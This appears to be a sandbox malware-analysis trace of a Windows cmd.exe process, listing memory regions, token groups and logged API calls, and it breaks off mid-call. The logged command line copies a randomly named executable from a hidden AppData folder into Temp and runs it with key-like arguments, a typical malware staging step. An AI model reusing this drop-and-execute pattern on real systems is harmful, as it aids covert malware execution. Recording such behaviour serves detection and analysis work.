"BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT 
AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7080 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 7081 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 7082 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 7083 start_va = 0x190000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 7084 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 7085 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7086 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 7087 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 7088 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 7089 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 7247 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 7248 start_va = 0x20000 end_va = 0x2ffff entry_point = 
0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 7249 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7250 start_va = 0x150000 end_va = 0x15ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 7251 start_va = 0x3d0000 end_va = 0x4cffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 7252 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 7253 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 7254 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 7255 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 7256 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 7257 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 7258 start_va = 
0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 7259 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 7260 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 7265 start_va = 0x290000 end_va = 0x357fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 7266 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 7267 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 7268 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 7269 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 7270 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 7271 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 7272 start_va = 0x4d0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 7273 start_va = 0x5e0000 end_va = 0x11dffff entry_point = 
0x0 region_type = pagefile_backed name = "pagefile_0x00000000005e0000" filename = "" Region: id = 7274 start_va = 0x11e0000 end_va = 0x1342fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011e0000" filename = "" Region: id = 7357 start_va = 0x1350000 end_va = 0x161efff entry_point = 0x1350000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 70 os_tid = 0xd6c [0112.616] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28fe54 | out: lpSystemTimeAsFileTime=0x28fe54*(dwLowDateTime=0x8121b6a0, dwHighDateTime=0x1d440a9)) [0112.616] GetCurrentProcessId () returned 0xd68 [0112.616] GetCurrentThreadId () returned 0xd6c [0112.616] GetTickCount () returned 0x26f84 [0112.616] QueryPerformanceCounter (in: lpPerformanceCount=0x28fe4c | out: lpPerformanceCount=0x28fe4c*=16940520178) returned 1 [0112.616] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0112.617] __set_app_type (_Type=0x1) [0112.617] __p__fmode () returned 0x76b331f4 [0112.617] __p__commode () returned 0x76b331fc [0112.617] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0112.617] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0112.617] GetCurrentThreadId () returned 0xd6c [0112.617] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xd6c) returned 0x38 [0112.617] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0112.617] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0112.617] SetThreadUILanguage (LangId=0x0) returned 0x409 [0112.617] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0112.617] RegOpenKeyExW (in: 
hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x28fde4 | out: phkResult=0x28fde4*=0x0) returned 0x2 [0112.617] VirtualQuery (in: lpAddress=0x28fe1b, lpBuffer=0x28fdb4, dwLength=0x1c | out: lpBuffer=0x28fdb4*(BaseAddress=0x28f000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0112.617] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x28fdb4, dwLength=0x1c | out: lpBuffer=0x28fdb4*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0112.617] VirtualQuery (in: lpAddress=0x191000, lpBuffer=0x28fdb4, dwLength=0x1c | out: lpBuffer=0x28fdb4*(BaseAddress=0x191000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0112.617] VirtualQuery (in: lpAddress=0x193000, lpBuffer=0x28fdb4, dwLength=0x1c | out: lpBuffer=0x28fdb4*(BaseAddress=0x193000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0112.617] VirtualQuery (in: lpAddress=0x290000, lpBuffer=0x28fdb4, dwLength=0x1c | out: lpBuffer=0x28fdb4*(BaseAddress=0x290000, AllocationBase=0x290000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0112.617] GetConsoleOutputCP () returned 0x1b5 [0112.618] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0112.618] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0112.618] _get_osfhandle (_FileHandle=1) returned 0x7 [0112.618] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0112.618] _get_osfhandle (_FileHandle=1) returned 0x7 [0112.618] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0112.618] _get_osfhandle (_FileHandle=1) 
returned 0x7 [0112.618] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0112.618] _get_osfhandle (_FileHandle=0) returned 0x3 [0112.618] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0112.618] _get_osfhandle (_FileHandle=0) returned 0x3 [0112.618] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0112.618] GetEnvironmentStringsW () returned 0x3e0380* [0112.619] FreeEnvironmentStringsW (penv=0x3e0380) returned 1 [0112.619] GetEnvironmentStringsW () returned 0x3e0380* [0112.619] FreeEnvironmentStringsW (penv=0x3e0380) returned 1 [0112.619] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28ed54 | out: phkResult=0x28ed54*=0x40) returned 0x0 [0112.619] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28ed5c, lpData=0x28ed60, lpcbData=0x28ed58*=0x1000 | out: lpType=0x28ed5c*=0x0, lpData=0x28ed60*=0x30, lpcbData=0x28ed58*=0x1000) returned 0x2 [0112.619] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28ed5c, lpData=0x28ed60, lpcbData=0x28ed58*=0x1000 | out: lpType=0x28ed5c*=0x4, lpData=0x28ed60*=0x1, lpcbData=0x28ed58*=0x4) returned 0x0 [0112.619] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28ed5c, lpData=0x28ed60, lpcbData=0x28ed58*=0x1000 | out: lpType=0x28ed5c*=0x0, lpData=0x28ed60*=0x1, lpcbData=0x28ed58*=0x1000) returned 0x2 [0112.619] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28ed5c, lpData=0x28ed60, lpcbData=0x28ed58*=0x1000 | out: lpType=0x28ed5c*=0x4, lpData=0x28ed60*=0x0, lpcbData=0x28ed58*=0x4) returned 0x0 [0112.619] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28ed5c, lpData=0x28ed60, lpcbData=0x28ed58*=0x1000 | out: lpType=0x28ed5c*=0x4, lpData=0x28ed60*=0x40, lpcbData=0x28ed58*=0x4) 
returned 0x0 [0112.619] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28ed5c, lpData=0x28ed60, lpcbData=0x28ed58*=0x1000 | out: lpType=0x28ed5c*=0x4, lpData=0x28ed60*=0x40, lpcbData=0x28ed58*=0x4) returned 0x0 [0112.619] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28ed5c, lpData=0x28ed60, lpcbData=0x28ed58*=0x1000 | out: lpType=0x28ed5c*=0x0, lpData=0x28ed60*=0x40, lpcbData=0x28ed58*=0x1000) returned 0x2 [0112.619] RegCloseKey (hKey=0x40) returned 0x0 [0112.619] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28ed54 | out: phkResult=0x28ed54*=0x40) returned 0x0 [0112.619] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28ed5c, lpData=0x28ed60, lpcbData=0x28ed58*=0x1000 | out: lpType=0x28ed5c*=0x0, lpData=0x28ed60*=0x40, lpcbData=0x28ed58*=0x1000) returned 0x2 [0112.619] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28ed5c, lpData=0x28ed60, lpcbData=0x28ed58*=0x1000 | out: lpType=0x28ed5c*=0x4, lpData=0x28ed60*=0x1, lpcbData=0x28ed58*=0x4) returned 0x0 [0112.619] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28ed5c, lpData=0x28ed60, lpcbData=0x28ed58*=0x1000 | out: lpType=0x28ed5c*=0x0, lpData=0x28ed60*=0x1, lpcbData=0x28ed58*=0x1000) returned 0x2 [0112.619] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28ed5c, lpData=0x28ed60, lpcbData=0x28ed58*=0x1000 | out: lpType=0x28ed5c*=0x4, lpData=0x28ed60*=0x0, lpcbData=0x28ed58*=0x4) returned 0x0 [0112.619] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28ed5c, lpData=0x28ed60, lpcbData=0x28ed58*=0x1000 | out: lpType=0x28ed5c*=0x4, lpData=0x28ed60*=0x9, lpcbData=0x28ed58*=0x4) returned 0x0 [0112.619] RegQueryValueExW (in: hKey=0x40, 
lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28ed5c, lpData=0x28ed60, lpcbData=0x28ed58*=0x1000 | out: lpType=0x28ed5c*=0x4, lpData=0x28ed60*=0x9, lpcbData=0x28ed58*=0x4) returned 0x0 [0112.619] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28ed5c, lpData=0x28ed60, lpcbData=0x28ed58*=0x1000 | out: lpType=0x28ed5c*=0x0, lpData=0x28ed60*=0x9, lpcbData=0x28ed58*=0x1000) returned 0x2 [0112.620] RegCloseKey (hKey=0x40) returned 0x0 [0112.620] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88635a [0112.620] srand (_Seed=0x5b88635a) [0112.620] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FIXLNKVIEW\" \"60000\"" [0112.620] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FIXLNKVIEW\" \"60000\"" [0112.620] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0112.620] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3e1ae0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0112.620] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0112.620] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: 
lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0112.620] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0112.620] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0112.620] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0112.620] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0112.620] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0112.620] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0112.620] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0112.620] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0112.620] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0112.620] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0112.621] GetEnvironmentStringsW () returned 0x3e24d0* [0112.621] FreeEnvironmentStringsW (penv=0x3e24d0) returned 1 [0112.621] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0112.621] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0112.621] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0112.621] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0112.621] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0112.621] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0112.621] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0112.621] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0112.621] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0112.621] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0112.621] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x28fb20 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0112.621] 
GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x28fb20, lpFilePart=0x28fb1c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x28fb1c*="Desktop") returned 0x18 [0112.621] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0112.621] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x28f89c | out: lpFindFileData=0x28f89c) returned 0x3e0b60 [0112.621] FindClose (in: hFindFile=0x3e0b60 | out: hFindFile=0x3e0b60) returned 1 [0112.621] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x28f89c | out: lpFindFileData=0x28f89c) returned 0x3e0b60 [0112.621] FindClose (in: hFindFile=0x3e0b60 | out: hFindFile=0x3e0b60) returned 1 [0112.621] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x28f89c | out: lpFindFileData=0x28f89c) returned 0x3e0b60 [0112.622] FindClose (in: hFindFile=0x3e0b60 | out: hFindFile=0x3e0b60) returned 1 [0112.622] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0112.622] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0112.622] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0112.622] GetEnvironmentStringsW () returned 0x3e0380* [0112.622] FreeEnvironmentStringsW (penv=0x3e0380) returned 1 [0112.622] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0112.622] GetConsoleOutputCP () returned 0x1b5 [0112.622] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0112.622] GetUserDefaultLCID () returned 0x409 [0112.623] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0112.623] GetLocaleInfoW (in: Locale=0x409, 
LCType=0x23, lpLCData=0x28fc60, cchData=128 | out: lpLCData="0") returned 2 [0112.623] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x28fc60, cchData=128 | out: lpLCData="0") returned 2 [0112.623] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x28fc60, cchData=128 | out: lpLCData="1") returned 2 [0112.623] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0112.623] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0112.623] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0112.623] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0112.623] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0112.623] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0112.623] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0112.623] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0112.623] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0112.623] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0112.623] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0112.624] GetConsoleTitleW (in: lpConsoleTitle=0x3d0a08, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0112.624] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0112.624] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0112.624] GetProcAddress (hModule=0x76910000, 
lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0112.624] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0112.625] _wcsicmp (_String1="type", _String2=")") returned 75 [0112.625] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0112.625] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0112.625] _wcsicmp (_String1="IF", _String2="type") returned -11 [0112.625] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0112.625] _wcsicmp (_String1="REM", _String2="type") returned -2 [0112.625] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0112.630] _wcsicmp (_String1="FOR", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\"") returned 68 [0112.630] _wcsicmp (_String1="FOR/?", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\"") returned 68 [0112.630] _wcsicmp (_String1="IF", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\"") returned 71 [0112.630] _wcsicmp (_String1="IF/?", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\"") returned 71 [0112.630] _wcsicmp (_String1="REM", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\"") returned 80 [0112.630] _wcsicmp (_String1="REM/?", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\"") returned 80 [0112.633] _get_osfhandle (_FileHandle=1) returned 0x7 [0112.633] _get_osfhandle (_FileHandle=1) returned 0x7 [0112.633] _get_osfhandle (_FileHandle=1) returned 0x7 [0112.633] GetFileType (hFile=0x7) returned 0x2 [0112.633] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0112.633] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28faf4 | out: lpMode=0x28faf4) returned 1 [0112.633] _dup (_FileHandle=1) returned 3 [0112.634] _close (_FileHandle=1) returned 0 [0112.634] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe", _String2="con") returned -53 [0112.634] CreateFileW 
(lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\hvgo9ckx.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x28fac4, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0112.634] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0112.634] GetConsoleTitleW (in: lpConsoleTitle=0x28f8f4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0112.719] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0112.719] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0112.719] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0112.719] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0112.720] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0112.720] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe", fInfoLevelId=0x1, lpFindFileData=0x28f458, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28f458) returned 0x3d0f60 [0112.720] _wcsicmp (_String1="XEY8d7zI.exe", _String2=".") returned 74 [0112.720] _wcsicmp (_String1="XEY8d7zI.exe", _String2="..") returned 74 [0112.720] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe")) returned 0x2020 [0112.720] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x28e364, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0112.721] _open_osfhandle 